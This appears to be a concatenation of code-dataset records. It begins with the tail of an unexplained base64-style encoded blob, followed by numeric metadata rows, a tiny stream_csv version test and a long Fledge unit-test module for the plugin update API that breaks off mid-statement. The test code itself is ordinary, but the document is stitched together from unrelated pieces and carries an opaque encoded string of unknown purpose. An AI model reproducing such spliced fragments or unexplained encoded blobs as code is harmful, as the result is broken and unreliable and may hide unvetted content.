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")))
| 2,157 | 6,443 | 0.967857 | 184 | 6,471 | 34.038043 | 0.98913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16141 | 0.000464 | 6,471 | 2 | 6,444 | 3,235.5 | 0.806895 | 0 | 0 | 0 | 0 | 0.5 | 0.989028 | 0.989028 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
cefb2e7874bb5d1c4a0c74bf3825629cd06a1377 | 85 | py | Python | tests/test_version.py | Kludex/stream-csv | 44c737be9ae8b21254be253e4772618f465d3740 | [
"MIT"
] | null | null | null | tests/test_version.py | Kludex/stream-csv | 44c737be9ae8b21254be253e4772618f465d3740 | [
"MIT"
] | null | null | null | tests/test_version.py | Kludex/stream-csv | 44c737be9ae8b21254be253e4772618f465d3740 | [
"MIT"
] | null | null | null | import stream_csv
def test_version():
assert stream_csv.__version__ == "0.1.0"
| 14.166667 | 44 | 0.717647 | 13 | 85 | 4.153846 | 0.692308 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042254 | 0.164706 | 85 | 5 | 45 | 17 | 0.71831 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
301058ef64c36d61b09d02530bb0393c6927f72a | 42,659 | py | Python | tests/unit/python/fledge/services/core/api/plugins/test_update.py | DDC-NDRS/fledge-iot_fledge | 27a5e66a55daaab1aca14ce6e66f9f1e6efaef51 | [
"Apache-2.0"
] | 69 | 2019-12-03T17:54:33.000Z | 2022-03-13T07:05:23.000Z | tests/unit/python/fledge/services/core/api/plugins/test_update.py | DDC-NDRS/fledge-iot_fledge | 27a5e66a55daaab1aca14ce6e66f9f1e6efaef51 | [
"Apache-2.0"
] | 125 | 2020-02-13T15:11:28.000Z | 2022-03-29T14:42:36.000Z | tests/unit/python/fledge/services/core/api/plugins/test_update.py | DDC-NDRS/fledge-iot_fledge | 27a5e66a55daaab1aca14ce6e66f9f1e6efaef51 | [
"Apache-2.0"
] | 24 | 2019-12-27T07:48:45.000Z | 2022-03-13T07:05:28.000Z | # -*- coding: utf-8 -*-
# FLEDGE_BEGIN
# See: http://fledge-iot.readthedocs.io/
# FLEDGE_END
import json
import uuid
from unittest.mock import patch, MagicMock
import pytest
import sys
import asyncio
from aiohttp import web
from fledge.services.core import routes
from fledge.services.core import server
from fledge.services.core import connect
from fledge.services.core.api.plugins import update as plugins_update
from fledge.services.core.api.plugins.exceptions import *
from fledge.services.core.scheduler.scheduler import Scheduler
from fledge.common.storage_client.storage_client import StorageClientAsync
from fledge.common.plugin_discovery import PluginDiscovery
from fledge.common.configuration_manager import ConfigurationManager
__author__ = "Ashish Jabble"
__copyright__ = "Copyright (c) 2020 Dianomic Systems Inc."
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
@pytest.allure.feature("unit")
@pytest.allure.story("api", "plugins", "update")
class TestPluginUpdate:
@pytest.fixture
def client(self, loop, test_client):
app = web.Application(loop=loop)
# fill the routes table
routes.setup(app)
return loop.run_until_complete(test_client(app))
@pytest.mark.parametrize("param", [
"blah",
1,
"notificationDelivery"
"notificationRule"
])
async def test_bad_type_plugin(self, client, param):
resp = await client.put('/fledge/plugins/{}/name/update'.format(param), data=None)
assert 400 == resp.status
assert "Invalid plugin type. Must be one of 'south' , north', 'filter', 'notify' or 'rule'" == resp.reason
@pytest.mark.parametrize("_type, plugin_installed_dirname", [
('south', 'Random'),
('north', 'http_north')
])
async def test_package_already_in_progress(self, client, _type, plugin_installed_dirname):
async def async_mock(return_value):
return return_value
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower().replace("_", "-"))
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
select_row_resp = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": pkg_name,
"action": "update",
"status": -1,
"log_file_uri": ""
}]}
msg = '{} package update already in progress'.format(pkg_name)
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv = await async_mock(select_row_resp)
else:
_rv = asyncio.ensure_future(async_mock(select_row_resp))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
return_value=_rv) as query_tbl_patch:
resp = await client.put('/fledge/plugins/{}/{}/update'.format(_type, plugin_installed_dirname),
data=None)
assert 429 == resp.status
assert msg == resp.reason
r = await resp.text()
actual = json.loads(r)
assert {'message': msg} == actual
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
@pytest.mark.parametrize("_type, plugin_installed_dirname", [
('south', 'Random'),
('north', 'http_north')
])
async def test_plugin_not_found(self, client, _type, plugin_installed_dirname):
async def async_mock(return_value):
return return_value
plugin_name = 'sinusoid'
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower().replace("_", "-"))
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_name, "type": _type, "description": "{} plugin".format(_type),
"version": "1.8.1", "installedDirectory": "{}/{}".format(_type, plugin_name),
"packageName": pkg_name}]
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv = await async_mock({'count': 0, 'rows': []})
else:
_rv = asyncio.ensure_future(async_mock({'count': 0, 'rows': []}))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=_rv) as query_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
resp = await client.put('/fledge/plugins/{}/{}/update'.format(_type, plugin_installed_dirname),
data=None)
assert 404 == resp.status
assert "'{} plugin is not yet installed. So update is not possible.'".format(
plugin_installed_dirname) == resp.reason
plugin_installed_patch.assert_called_once_with(_type, False)
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
@pytest.mark.parametrize("_type, plugin_installed_dirname", [
('south', 'Random'),
('north', 'http_north')
])
async def test_plugin_update_when_not_in_use(self, client, _type, plugin_installed_dirname):
async def async_mock(return_value):
return return_value
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower().replace("_", "-"))
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_installed_dirname, "type": _type,
"description": "{} plugin".format(_type), "version": "1.8.1",
"installedDirectory": "{}/{}".format(_type, plugin_installed_dirname),
"packageName": pkg_name}]
insert = {"response": "inserted", "rows_affected": 1}
insert_row = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": plugin_installed_dirname,
"action": "update",
"status": -1,
"log_file_uri": ""
}]}
svc_name = 'R1'
tracked_plugins = [{'plugin': 'sinusoid', 'service': 'S1'}, {'plugin': 'Random', 'service': svc_name},
{'plugin': 'http_north', 'service': svc_name}]
sch_info = [{'id': '6637c9ff-7090-4774-abca-07dee59a0610', 'enabled': 'f'}]
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv1 = await async_mock(tracked_plugins)
_rv2 = await async_mock(sch_info)
_rv3 = await async_mock(insert)
_se1 = await async_mock({'count': 0, 'rows': []})
_se2 = await async_mock(insert_row)
else:
_rv1 = asyncio.ensure_future(async_mock(tracked_plugins))
_rv2 = asyncio.ensure_future(async_mock(sch_info))
_rv3 = asyncio.ensure_future(async_mock(insert))
_se1 = asyncio.ensure_future(async_mock({'count': 0, 'rows': []}))
_se2 = asyncio.ensure_future(async_mock(insert_row))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
side_effect=[_se1, _se2]) as query_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
with patch.object(plugins_update, '_get_plugin_and_sch_name_from_asset_tracker',
return_value=_rv1) as plugin_tracked_patch:
with patch.object(plugins_update, '_get_sch_id_and_enabled_by_name',
return_value=_rv2) as schedule_patch:
with patch.object(storage_client_mock, 'insert_into_tbl',
return_value=_rv3) as insert_tbl_patch:
with patch('multiprocessing.Process'):
resp = await client.put('/fledge/plugins/{}/{}/update'.format(
_type, plugin_installed_dirname), data=None)
assert 200 == resp.status
result = await resp.text()
response = json.loads(result)
assert 'id' in response
assert '{} update started.'.format(pkg_name) == response['message']
assert response['statusLink'].startswith('fledge/package/update/status?id=')
args, kwargs = insert_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
actual = json.loads(args[1])
assert 'id' in actual
assert pkg_name == actual['name']
assert 'update' == actual['action']
assert -1 == actual['status']
assert '' == actual['log_file_uri']
schedule_patch.assert_called_once_with(svc_name)
plugin_tracked_patch.assert_called_once_with(_type)
plugin_installed_patch.assert_called_once_with(_type, False)
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
@pytest.mark.parametrize("_type, plugin_installed_dirname", [
('south', 'Random'),
('north', 'http_north')
])
async def test_plugin_update_when_in_use(self, client, _type, plugin_installed_dirname):
async def async_mock(return_value):
return return_value
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower().replace("_", "-"))
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
select_row_resp = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": pkg_name,
"action": "purge",
"status": 0,
"log_file_uri": ""
}]}
delete = {"response": "deleted", "rows_affected": 1}
delete_payload = {"where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_installed_dirname, "type": _type,
"description": "{} plugin".format(_type), "version": "1.8.1",
"installedDirectory": "{}/{}".format(_type, plugin_installed_dirname),
"packageName": pkg_name}]
insert = {"response": "inserted", "rows_affected": 1}
insert_row = {'count': 1, 'rows': [
{"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578", "name": plugin_installed_dirname, "action": "update",
"status": -1, "log_file_uri": ""}]}
svc_name = 'R1'
tracked_plugins = [{'plugin': 'sinusoid', 'service': 'S1'}, {'plugin': 'Random', 'service': svc_name},
{'plugin': 'http_north', 'service': svc_name}]
sch_info = [{'id': '6637c9ff-7090-4774-abca-07dee59a0610', 'enabled': 't'}]
server.Server.scheduler = Scheduler(None, None)
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv1 = await async_mock(tracked_plugins)
_rv2 = await async_mock(sch_info)
_rv3 = await async_mock(insert)
_rv4 = await async_mock(delete)
_rv5 = await async_mock((True, "Schedule successfully disabled"))
_se1 = await async_mock(select_row_resp)
_se2 = await async_mock(insert_row)
else:
_rv1 = asyncio.ensure_future(async_mock(tracked_plugins))
_rv2 = asyncio.ensure_future(async_mock(sch_info))
_rv3 = asyncio.ensure_future(async_mock(insert))
_rv4 = asyncio.ensure_future(async_mock(delete))
_rv5 = asyncio.ensure_future(async_mock((True, "Schedule successfully disabled")))
_se1 = asyncio.ensure_future(async_mock(select_row_resp))
_se2 = asyncio.ensure_future(async_mock(insert_row))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
side_effect=[_se1, _se2]) as query_tbl_patch:
with patch.object(storage_client_mock, 'delete_from_tbl',
return_value=_rv4) as delete_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
with patch.object(plugins_update, '_get_plugin_and_sch_name_from_asset_tracker',
return_value=_rv1) as plugin_tracked_patch:
with patch.object(plugins_update, '_get_sch_id_and_enabled_by_name',
return_value=_rv2) as schedule_patch:
with patch.object(server.Server.scheduler, 'disable_schedule', return_value=_rv5) as disable_sch_patch:
with patch.object(plugins_update._logger, "warning") as log_warn_patch:
with patch.object(storage_client_mock, 'insert_into_tbl',
return_value=_rv3) as insert_tbl_patch:
with patch('multiprocessing.Process'):
resp = await client.put('/fledge/plugins/{}/{}/update'.format(
_type, plugin_installed_dirname), data=None)
server.Server.scheduler = None
assert 200 == resp.status
result = await resp.text()
response = json.loads(result)
assert 'id' in response
assert '{} update started.'.format(pkg_name) == response['message']
assert response['statusLink'].startswith(
'fledge/package/update/status?id=')
args, kwargs = insert_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
actual = json.loads(args[1])
assert 'id' in actual
assert pkg_name == actual['name']
assert 'update' == actual['action']
assert -1 == actual['status']
assert '' == actual['log_file_uri']
assert 1 == log_warn_patch.call_count
log_warn_patch.assert_called_once_with(
'Disabling {} {} instance, as {} plugin is being updated...'.format(
svc_name, _type, plugin_installed_dirname))
disable_sch_patch.assert_called_once_with(uuid.UUID(sch_info[0]['id']))
schedule_patch.assert_called_once_with(svc_name)
plugin_tracked_patch.assert_called_once_with(_type)
plugin_installed_patch.assert_called_once_with(_type, False)
args, kwargs = delete_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert delete_payload == json.loads(args[1])
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
async def test_filter_plugin_update_when_not_in_use(self, client, _type='filter', plugin_installed_dirname='delta'):
async def async_mock(return_value):
return return_value
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower())
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_installed_dirname, "type": _type,
"description": "{} plugin".format(_type), "version": "1.8.1",
"installedDirectory": "{}/{}".format(_type, plugin_installed_dirname),
"packageName": pkg_name}]
filter_row = {'count': 1, 'rows': [{'name': plugin_installed_dirname}]}
insert = {"response": "inserted", "rows_affected": 1}
insert_row = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": plugin_installed_dirname,
"action": "update",
"status": -1,
"log_file_uri": ""
}]}
svc_name = 'R1'
tracked_plugins = [{'plugin': 'sinusoid', 'service': 'S1'}, {'plugin': 'Random', 'service': svc_name},
{'plugin': 'http_north', 'service': svc_name}, {'plugin': plugin_installed_dirname,
'service': svc_name}]
sch_info = [{'id': '6637c9ff-7090-4774-abca-07dee59a0610', 'enabled': 'f'}]
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv1 = await async_mock(tracked_plugins)
_rv2 = await async_mock(sch_info)
_rv3 = await async_mock(insert)
_se1 = await async_mock({'count': 0, 'rows': []})
_se2 = await async_mock(insert_row)
_se3 = await async_mock(filter_row)
else:
_rv1 = asyncio.ensure_future(async_mock(tracked_plugins))
_rv2 = asyncio.ensure_future(async_mock(sch_info))
_rv3 = asyncio.ensure_future(async_mock(insert))
_se1 = asyncio.ensure_future(async_mock({'count': 0, 'rows': []}))
_se2 = asyncio.ensure_future(async_mock(insert_row))
_se3 = asyncio.ensure_future(async_mock(filter_row))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
side_effect=[_se1, _se3, _se2]) as query_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
with patch.object(plugins_update, '_get_plugin_and_sch_name_from_asset_tracker',
return_value=_rv1) as plugin_tracked_patch:
with patch.object(plugins_update, '_get_sch_id_and_enabled_by_name',
return_value=_rv2) as schedule_patch:
with patch.object(storage_client_mock, 'insert_into_tbl',
return_value=_rv3) as insert_tbl_patch:
with patch('multiprocessing.Process'):
resp = await client.put('/fledge/plugins/{}/{}/update'.format(
_type, plugin_installed_dirname), data=None)
assert 200 == resp.status
result = await resp.text()
response = json.loads(result)
assert 'id' in response
assert '{} update started.'.format(pkg_name) == response['message']
assert response['statusLink'].startswith('fledge/package/update/status?id=')
args, kwargs = insert_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
actual = json.loads(args[1])
assert 'id' in actual
assert pkg_name == actual['name']
assert 'update' == actual['action']
assert -1 == actual['status']
assert '' == actual['log_file_uri']
schedule_patch.assert_called_once_with(svc_name)
plugin_tracked_patch.assert_called_once_with(_type)
plugin_installed_patch.assert_called_once_with(_type, False)
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
async def test_filter_update_when_in_use(self, client, _type='filter', plugin_installed_dirname='delta'):
async def async_mock(return_value):
return return_value
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower())
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
select_row_resp = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": pkg_name,
"action": "purge",
"status": 0,
"log_file_uri": ""
}]}
filter_row = {'count': 1, 'rows': [{'name': plugin_installed_dirname}]}
delete = {"response": "deleted", "rows_affected": 1}
delete_payload = {"where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_installed_dirname, "type": _type,
"description": "{} plugin".format(_type), "version": "1.8.1",
"installedDirectory": "{}/{}".format(_type, plugin_installed_dirname),
"packageName": pkg_name}]
insert = {"response": "inserted", "rows_affected": 1}
insert_row = {'count': 1, 'rows': [
{"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578", "name": plugin_installed_dirname, "action": "update",
"status": -1, "log_file_uri": ""}]}
svc_name = 'R1'
tracked_plugins = [{'plugin': 'sinusoid', 'service': 'S1'}, {'plugin': 'Random', 'service': svc_name},
{'plugin': 'http_north', 'service': svc_name}, {'plugin': plugin_installed_dirname,
'service': svc_name}]
sch_info = [{'id': '6637c9ff-7090-4774-abca-07dee59a0610', 'enabled': 't'}]
server.Server.scheduler = Scheduler(None, None)
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv1 = await async_mock(tracked_plugins)
_rv2 = await async_mock(sch_info)
_rv3 = await async_mock(insert)
_rv4 = await async_mock(delete)
_rv5 = await async_mock((True, "Schedule successfully disabled"))
_se1 = await async_mock(select_row_resp)
_se2 = await async_mock(insert_row)
_se3 = await async_mock(filter_row)
else:
_rv1 = asyncio.ensure_future(async_mock(tracked_plugins))
_rv2 = asyncio.ensure_future(async_mock(sch_info))
_rv3 = asyncio.ensure_future(async_mock(insert))
_rv4 = asyncio.ensure_future(async_mock(delete))
_rv5 = asyncio.ensure_future(async_mock((True, "Schedule successfully disabled")))
_se1 = asyncio.ensure_future(async_mock(select_row_resp))
_se2 = asyncio.ensure_future(async_mock(insert_row))
_se3 = asyncio.ensure_future(async_mock(filter_row))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
side_effect=[_se1, _se3, _se2]) as query_tbl_patch:
with patch.object(storage_client_mock, 'delete_from_tbl',
return_value=_rv4) as delete_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
) as plugin_installed_patch:
with patch.object(plugins_update, '_get_plugin_and_sch_name_from_asset_tracker',
return_value=_rv1) as plugin_tracked_patch:
with patch.object(plugins_update, '_get_sch_id_and_enabled_by_name',
return_value=_rv2) as schedule_patch:
with patch.object(server.Server.scheduler, 'disable_schedule', return_value=_rv5) as disable_sch_patch:
with patch.object(plugins_update._logger, "warning") as log_warn_patch:
with patch.object(storage_client_mock, 'insert_into_tbl',
return_value=_rv3) as insert_tbl_patch:
with patch('multiprocessing.Process'):
resp = await client.put('/fledge/plugins/{}/{}/update'.format(
_type, plugin_installed_dirname), data=None)
server.Server.scheduler = None
assert 200 == resp.status
result = await resp.text()
response = json.loads(result)
assert 'id' in response
assert '{} update started.'.format(pkg_name) == response['message']
assert response['statusLink'].startswith(
'fledge/package/update/status?id=')
args, kwargs = insert_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
actual = json.loads(args[1])
assert 'id' in actual
assert pkg_name == actual['name']
assert 'update' == actual['action']
assert -1 == actual['status']
assert '' == actual['log_file_uri']
assert 1 == log_warn_patch.call_count
log_warn_patch.assert_called_once_with(
'Disabling {} {} instance, as {} plugin is being updated...'.format(
svc_name, _type, plugin_installed_dirname))
disable_sch_patch.assert_called_once_with(uuid.UUID(sch_info[0]['id']))
schedule_patch.assert_called_once_with(svc_name)
plugin_tracked_patch.assert_called_once_with(_type)
plugin_installed_patch.assert_called_once_with(_type, False)
args, kwargs = delete_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert delete_payload == json.loads(args[1])
args, kwargs = query_tbl_patch.call_args_list[0]
assert 'packages' == args[0]
assert payload == json.loads(args[1])
@pytest.mark.parametrize("_type, plugin_installed_dirname", [
('notify', 'Telegram'),
('rule', 'OutOfBound')
])
async def test_notify_plugin_update_when_not_in_use(self, client, _type, plugin_installed_dirname):
async def async_mock(return_value):
return return_value
_type = "notify"
plugin_type_installed_dir = "notificationRule" if _type == 'rule' else "notificationDelivery"
pkg_name = "fledge-{}-{}".format(_type, plugin_installed_dirname.lower())
payload = {"return": ["status"], "where": {"column": "action", "condition": "=", "value": "update",
"and": {"column": "name", "condition": "=", "value": pkg_name}}}
plugin_installed = [{"name": plugin_installed_dirname, "type": _type,
"description": "{} C plugin".format(plugin_type_installed_dir), "version": "1.8.1",
"installedDirectory": "{}/{}".format(plugin_type_installed_dir, plugin_installed_dirname),
"packageName": pkg_name}]
insert = {"response": "inserted", "rows_affected": 1}
insert_row = {'count': 1, 'rows': [{
"id": "c5648940-31ec-4f78-a7a5-b1707e8fe578",
"name": plugin_installed_dirname,
"action": "update",
"status": -1,
"log_file_uri": ""
}]}
sch_info = {'count': 1, 'rows': [{'id': '6637c9ff-7090-4774-abca-07dee59a0610', 'enabled': 'f'}]}
storage_client_mock = MagicMock(StorageClientAsync)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv1 = await async_mock(insert)
_se1 = await async_mock({'count': 0, 'rows': []})
_se2 = await async_mock(insert_row)
_se3 = await async_mock(sch_info)
else:
_rv1 = asyncio.ensure_future(async_mock(insert))
_se1 = asyncio.ensure_future(async_mock({'count': 0, 'rows': []}))
_se2 = asyncio.ensure_future(async_mock(insert_row))
_se3 = asyncio.ensure_future(async_mock(sch_info))
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
side_effect=[_se1, _se3, _se2]) as query_tbl_patch:
with patch.object(PluginDiscovery, 'get_plugins_installed', return_value=plugin_installed
